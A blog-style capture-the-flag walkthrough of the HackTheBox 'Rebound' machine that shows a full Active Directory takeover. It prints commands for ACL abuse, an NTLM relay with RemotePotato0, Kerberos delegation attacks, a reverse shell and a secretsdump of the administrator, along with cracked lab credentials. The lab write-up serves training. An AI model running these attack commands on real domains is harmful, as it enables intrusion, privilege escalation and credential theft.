> For the complete documentation index, see [llms.txt](https://samfisher91.gitbook.io/samfisher-blog/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://samfisher91.gitbook.io/samfisher-blog/rebound-htb.md).

# Rebound - HTB

![](/files/3VY3m6QMsdsU4wuFaBfe)

## FootHold

Enumerating exist users

<figure><img src="/files/VOX7XwDXTGob3I7px9Yu" alt=""><figcaption></figcaption></figure>

GetUsersSPNs to grab their ticket with no-preauth user jjones

<figure><img src="/files/DDEEdNOm5FMbj6q6pdxt" alt=""><figcaption></figcaption></figure>

ldap\_monitor user were cracked

<figure><img src="/files/FXyoFho9rAn2V3PvPxXY" alt=""><figcaption></figcaption></figure>

```
ldap_monitor:1GR8t@$$4u
```

machine give error **`KRB_AP_ERR_SKEW(Clock skew too great)`**

after some googling i found this&#x20;

<figure><img src="/files/oe8zYuOmxTrd6qrtwGsz" alt=""><figcaption></figcaption></figure>

synchronizing time with the domain time as kerberos is a time sensitive

Creating a TGT

<figure><img src="/files/i7zwGVHHc1BjkGYqfpZe" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/BmiteSuWnZrGfSHqmxaU" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/NKW0SyAcwPVOiljtehth" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/D5k3q0Y0PGEEsMCmxAFy" alt=""><figcaption></figcaption></figure>

after reviewing bloodhound&#x20;

1- Add 'oorend' user to ServiceMgmt Group

```
bloodyAD -u oorend -d rebound.htb -p '1GR8t@$$4u' --host 10.10.11.231 add groupMember 'CN=SERVICEMGMT,CN=USERS,DC=REBOUND,DC=HTB' "CN=oorend,CN=Users,DC=rebound,DC=htb"
```

2- Get FullControl on OU Service Users

```
bloodyAD -u oorend -d rebound.htb -p '1GR8t@$$4u' --host 10.10.11.231 add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' "CN=oorend,CN=Users,DC=rebound,DC=htb"
```

3- Update winrm\_svc password

<pre><code><strong>bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.10.11.231 set password winrm_svc Ask1askaskask 
</strong>or
rpcclient
setuserinfo2 winrm_svc 23 Ask1askaskask

</code></pre>

<figure><img src="/files/BM9qRM9vild1bfJNhlsz" alt=""><figcaption></figcaption></figure>

## Root\#

first we need user tbrady&#x20;

exploit RPC -> Ldap

<https://github.com/antonioCoco/RemotePotato0>

It abuses the DCOM activation service and trigger an NTLM authentication of any user currently logged on in the target machine. It is required that a privileged user is logged on the same machine (e.g. a Domain Admin user). Once the NTLM type1 is triggered we setup a cross protocol relay server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource. RemotePotato0 also allows to grab and steal NTLMv2 hashes of every users logged on a machine.

so this is what to do&#x20;

1- setup a socat listener

`socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999`

2- setup a cross protocol relay \<ntlmrelayx >se server&#x20;

`python3 ntlmrelayx.py -t ldap://10.10.11.231 --no-wcf-server --escalate-user winrm_svc`

3- execute RemotePotato.exe

`.\RemotePotato.exe -m 2 -s 1 -r 10.10.14.15 -x 10.10.14.15 -p 9999`

<figure><img src="/files/frcfm7Jxk2iDuVhEjW5s" alt=""><figcaption></figcaption></figure>

cracked it with hashcat -m 5600

`tbrady : 543BOMBOMBUNmanda`

we cant get a shell with this user ,but we can still use bloodAD

The user tbrady has the ability to read the GMSA password of the delegator$ GMSA

The delegator GMSA has constrained delegation configured over the DC

<figure><img src="/files/YpOyWvaXFzipOoddPZ6f" alt=""><figcaption></figcaption></figure>

hash

`aad3b435b51404eeaad3b435b51404ee:9b0ccb7d34c670b2a9c81c45bc8befc3`

getting a TGT for ***delegator$***

<figure><img src="/files/hGZSYqrUM3TLD5TvfsfG" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/r9K4hZToGXAt1lmYveMB" alt=""><figcaption></figcaption></figure>

uploading RunasCs.exe&#x20;

```
.\RunasCs.exe tbrady 543BOMBOMBUNmanda "cmd.exe /c whoami"
```

we are able to execute commands as user tbrady ,lets upload reverseshell and give permission to folder

```
icacls "C:\Users\winrm_svc\Documents" /grant:r "Everyone:(OI)(CI)F" /T

```

```
.\RunasCs.exe tbrady 543BOMBOMBUNmanda "C:\Users\winrm_svc\Documents\shell.exe"
```

now from tbrady shell we execute Rubeus to improsenate administrator ticker

```
.\Rubeus.exe s4u /user:delegator$ /aes256:9861cac50c316fadde60e00ec4a3c63852afbe05443343cdb011be5f1d4ddc2b /domain:rebound.htb /impersonateuser:administrator /nowrap /ptt
```

ticket not yet imported so we copy the \<base64> and insert it in another command to import it&#x20;

```
.\Rubeus.exe ptt /ticket:<base64 ticket .........asdgb==>
```

Administrator TGT imported

&#x20;

<figure><img src="/files/4PVPlo6Da0jCTR41bJT2" alt=""><figcaption></figcaption></figure>

can take the decrypted ticket from base64 and convert it to be imported locally&#x20;

<figure><img src="/files/wIuuPVm6HFb5FwIBdI8B" alt=""><figcaption></figcaption></figure>

found out that /etc/hosts must be&#x20;

```
10.10.11.231 dc01.rebound.htb dc01
```

configuring Kerberos ticket delegation from the 'ldap\_monitor' service principal to the 'delegator$' service principal using LDAPS

```
python3 rbcd.py -aesKey 9861cac50c316fadde60e00ec4a3c63852afbe05443343cdb011be5f1d4ddc2b 'rebound.htb/delegator$' -delegate-to 'delegator$' -use-ldaps -debug -action write -delegate-from ldap_monitor
```

get ldap\_monitor TGT

now impresonate dc01$

```
python3 getST.pu -spn "browser/dc01.rebound.htb" -impersonate "dc01$" "rebound.htb/ldap_monitor" -k -no-pass
```

export the new administrator TGT

```
python3 secretsdump.py -no -k dc01.rebound.htb -just-dc-user administrator
```

<figure><img src="/files/xCEtd53wEWdfUJ08TeTB" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://samfisher91.gitbook.io/samfisher-blog/rebound-htb.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
